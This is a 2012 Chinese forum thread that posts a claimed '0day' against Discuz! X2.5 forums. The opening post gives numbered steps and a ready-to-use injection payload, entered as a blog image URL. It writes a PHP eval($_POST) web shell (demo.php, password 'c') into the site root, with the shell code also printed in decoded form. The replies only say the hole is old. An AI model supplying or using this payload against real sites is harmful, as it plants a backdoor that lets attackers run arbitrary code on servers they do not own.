不哭 发表于 2012-7-31 22:05:08

DZ X2.50day

1.注册任意账户
2.登陆用户,发表blog日志(注意是日志) //点击一下中间注册的用户名 就看到了
3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} //所使用代码

<?php @eval($_POST); ?>ok
<?fputs(fopen("dome","w"),"<?eval(\$_POST);?>")?>

4.访问日志,论坛根目录下生成demo.php,一句发密码C

冰河 发表于 2012-7-31 23:38:32

{:soso__12720334551543963771_3:}没想到你小子在这   还有把你丫的头像换了。

Free_小东 发表于 2012-8-1 14:00:11

{:soso_e140:}老洞了

getpro 发表于 2012-8-1 15:08:58

这个0day出来好几个月了还没补上????

crackjk2008 发表于 2012-8-2 11:53:53

这个洞都没什么用了

N.O 发表于 2012-8-3 19:00:05

{:soso_e127:}感谢楼主发了一个骨灰级的漏洞

冷域诗人 发表于 2012-8-3 19:55:48

洞老了 不建议尝试 除非你人品爆发

jaca 发表于 2012-8-7 14:57:31

骚年,过期了

zhuzai1314 发表于 2012-9-16 14:29:53

也太久了吧。

zhuzai1314 发表于 2012-9-16 14:30:09

也太久了吧。
页: [1] 2
查看完整版本: DZ X2.50day